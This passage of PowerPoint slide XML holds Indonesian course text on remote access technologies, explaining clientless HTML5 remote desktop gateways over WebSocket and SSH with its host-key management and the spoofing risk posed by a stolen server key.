            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memerlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Akses desktop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> browser web. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Elemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kanvas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperkenalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> HTML5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggambar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperbarui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> desktop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>relatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> audio. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VPN HTML5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> gateway desktop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (guacamole.apache.org). Solusi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WebSocket, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memerlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> overhead </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> HTTP yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</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120</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="428412265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Secure Shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Secure Shell (SSH) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sarana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> terminal baris </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perintah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kegunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>administrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan transfer file yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (SFTP). Banyak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komersial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform NOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OpenSSH (openssh.com). Server SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host. Nama host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipetakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> manual oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SSH, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host SSH.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicurigai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyusupan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyamar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> spoofing, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
